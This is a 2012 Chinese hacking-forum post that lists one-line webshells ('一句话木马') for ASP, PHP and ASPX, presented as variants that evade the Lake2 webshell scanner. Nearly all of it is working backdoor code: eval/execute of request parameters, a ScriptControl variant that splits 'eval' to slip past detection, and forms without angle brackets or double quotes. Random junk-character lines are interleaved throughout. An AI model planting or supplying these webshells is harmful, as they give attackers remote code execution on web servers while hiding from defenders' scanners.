找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2017|回复: 0
打印 上一主题 下一主题

过雷克图一句话木马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:36:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
asp一句话  <%execute(request("1"))%>  
  z3 W& a0 `4 r: G( P
1 P% |; n5 U" J* o. L& @* T: p+ J4 aphp一句话  <?php eval($_POST[1]);?>  
( ?( s! w, ~% Q. G6 d. ~( Q+ Q$ q+ o$ C8 B- z( Q6 `# Z$ \
aspx一句话
0 G' w9 p2 n" e5 n+ J* J
+ {, W9 e4 p) D- g<script language="C#" runat="server">
4 j$ `$ X4 B, }( U
0 m( g5 C) o" n6 H- BWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");
$ x  O: O) R- K+ X
, O( W% c; K6 h! x. j/ Q0 G2 w( ]3 a</script>
+ N' C% H- }  S2 C9 V; v* i+ k* h8 U: K6 j+ J
可以躲过雷客图的一句话。
, L) u" Z0 u3 F/ T
$ a) j  ?9 N, e( @; X  `- J  <%
  K1 G# u% X2 Y/ _
2 ^5 Y4 O; C# Y6 A3 k6 r: x  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
1 q" m5 y, D2 l3 p
. U3 j) ]: s: S9 m" M7 W# E  ms.Language="VBScript"0 I' h( Q! V* E* h3 K

' O# `3 m0 B2 @) m0 Q  ms.AddObject "Response", Response- d' [5 A' {, D
" Q* J, [5 D/ {# e! X! h5 z! V
  ms.AddObject "request", request
& Q& `4 Y9 P8 f' t% a9 c( {
. y0 V) T- N. Q( p) @- Q  ms.ExecuteStatement("ev"&"al(request(""1""))")- E: L3 }  ~$ N
. z2 }# M+ S  r% I
  %>4 o% y. _6 c& Y0 z/ F+ B8 T# Y5 K
* e3 C. J6 R  V* J  K" W- |
  不用'<,>'的asp一句话9 [; K4 |' |3 P- d: N: Y1 L

: ?. v0 S$ I4 b, c  <script language=VBScript runat=server>execute request("1")</script>
* ]) O" o( o' R) M6 X. K
3 i: _9 d: O9 X9 @- [* n( e  不用双引号的一句话。6 [! o1 W! ~5 p$ U; a; G" g
+ @/ h  Y7 y6 g) h4 J. {5 H" {! x
  <%eval request(chr(35))%>
. j; F, O/ z! L3 q$ D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表